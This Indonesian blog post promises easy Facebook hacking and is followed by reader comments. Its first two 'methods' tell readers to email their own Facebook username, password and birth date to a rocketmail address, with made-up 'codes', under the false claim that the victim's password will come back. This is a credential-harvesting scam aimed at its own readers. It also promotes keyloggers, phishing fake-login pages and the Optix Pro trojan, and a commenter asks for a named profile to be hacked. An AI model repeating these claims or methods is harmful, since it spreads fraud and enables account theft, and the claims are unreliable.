4 cara Hack Facebook dengan mudah cepat di mengerti dan tidak ada jejak

assalamualaikum ,,nih gan kali ini saya posting tentang HacK Facabook Terbaruuuuuuu ..!!! gimana gan ,,sebenernya sih saya punya banyak akal buat curi pass Facebook orang ,,cuma kebetulan saya orang nya sangat berbagi ,,emmm ..yauda deh saya ambil keputusan ,,saya bongkar rahasia yang mudah buat hack facebook hehe ,,pertama kali nih saya bongkar rahasia saya ,, yauda deh langsung cabut aja yuks ada apasih di balik rahasia FirMan wkwk ,,ini nih ternyata gann

ffb waduhh sory ye gan saya telat buat bongkar rahasia saya hehe ,,baik dah sekarang aja yuks ..

ini cara yang ke satu gan ,,

1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..

2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.

3. Pada form isian to/ kepada masukkan alamat berikut:

pwordfacebook@rocketmail.com

Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita

4. Pada form cc dan bcc, kosongi saja kedua form tersebut

5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.

6. Pada form message (pesan), ketik kode UID berikut:

facebook.com FALSE/FALSE 1121114252079889
Username facebook : user ID facebook kamu
Facebook password : password kamu
Recover : user ID facebook korban
TTG : tanggal lahir kamu
6. Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban

Contohnya:

misalkan user ID facebook kamu adalah elite@yahoo.com
dan password kamu 3l1t3b3n3r4n
dan user ID facebook korban: korban@yahoo.com

maka susunannya adalah sebagai berikut:

to: pwordfacebook@rocketmail.com

cc:
bcc:
Subject: Recovery
message: facebook.com FALSE/FALSE 1121114252079889
Username facebook : elite@yahoo.com
Facebook password : 3l1t3b3n3r4n
Recover : korban@yahoo.com
TTG : 10041994

facebook.com FALSE/FALSE 1121114252079889 : Ini Adalah Kode Tertentu Di Facebook
___________________________________________

:: Cara Pencegahan ::

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

1. Pada form isian sento to: isikan

pwordfacebook@rocketmail.com

2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.

3. Kirim message sebagai berikut:

facebook.com No Rerovery
Username facebook : elite@yahoo.com
Facebook password : password kamu

contohnya yang sudah jadi:

to: pwordfacebook@rocketmail.com
cc:
bcc:
subject: No Recovery
message: facebook.com No Rerovery
Username facebook : username facebook kamu
Facebook password : password facebook kamu
TTG : tanggal lahir kamu

Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
facebook kamu di hack orang lain.

ini cara yang ke dua gan ,,

Bisa langung dari facebook kita jg tanpa harus membuka email

cara nyaLakukan langkah-langkah dibawah :

1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Klik compose message
3. Pada tulisan To isi dengan
pwordfacebook@rocketmail.com
4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
5. isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email facebook temen anda.
baris ketiga tulis password facebook anda.
baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
Lalu Send/Kirim.

Contoh :
To : pwordfacebook@rocketmail.com
Subject : PASSWORD RETRIEVE
Message :

anda@yahoo.co.id
temen anda@yahoo.com
Password anda
cgi-bin/$et76431&pwr999

Lalu Send/Kirim.

INGGAT : JANGAN DISALAHGUNAKAN!! Dan YANG INI BUAT PARA PENG-COPAS JANGAN DICOPAS YA SOALNYA BERBAHAYA BANGET!
Good luck…. ____________________________________________ ( SAYA PERNAH NYOBA DAN CARANYA BERHASIL 100% ).

CATATAN :
1. Jika anda mendapat pemberitahuan “Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days”
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.

ini cara yang ke tiga gan ,,

cara yang ke tiga sebelumnya saya pernah posting tentang keyloger gan ,,nah jadi buka WEB SAYA lalu cari dari artikel nya ada tentang Keyloger dah pokonya ,,

ini cara yang ke empat gan ,,

nah cara yang ke empat ini saya menggunakan Fakelogin gan ,,mungkin agan sudah tau ye hehe ,ituloh yang tampilan nya sama kaya facebook tapi itu milik seseorang yang sakti wkwkwk ,, itu mudah gan kalo di postingkan terlalu panjang gan ,,tapi kalo gak faham bisa di komen nanti yee ,,

yang lain nya masih banyak lagi gan cuma saya kasi tau aja yah saya sering menggunakan cara ini yang emang benar2 work gan tetapi di antara nya yang lebih pasti itu ,, ini nih

– Keyloger/Refog

-Fakelogin/web phising

-Optix Pro

dan yang lain dah tapi itu yang sering saya gunakan gan ,,semuanya juga WORK kok ,,gak ada ang abal-abal disini gan hehe,,

nah itutuh rahasia seorang Hacker gan ,,gimana ?

selamat mencoba ,,dan berikan komentarmu^^

 

4 Komentar

  1. lah yang mana nya gan ,,ini saya membantu loh ,,

  2. arta artha

    kalau gak tau alamat email korban gimana tuh gan ??

  3. salam mas tolong dong kasih hack akaun facebooknya ini dia udah menghak
    facebook gue dan mencuri group gue,orngnya sih dari malaysia dasar banget tu orang\
    URL facebooknya ini mas https://www.facebook.com/olie.nam.7 URL group gue ini
    https://www.facebook.com/groups/sandiwaracinta saya mohon pertolongan dari mas atau mbak
    kerna berbagai cara udah gua menghack facebooknya percuma aja enggak bisa juga..
    tolong gue ya ku mohon,klu udah kasih tau gue URL facebook gun ini mas/mbak..
    https://www.facebook.com/suzie.anna.948

    • uda di coba pake fakelogin mas ?

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

%d blogger menyukai ini: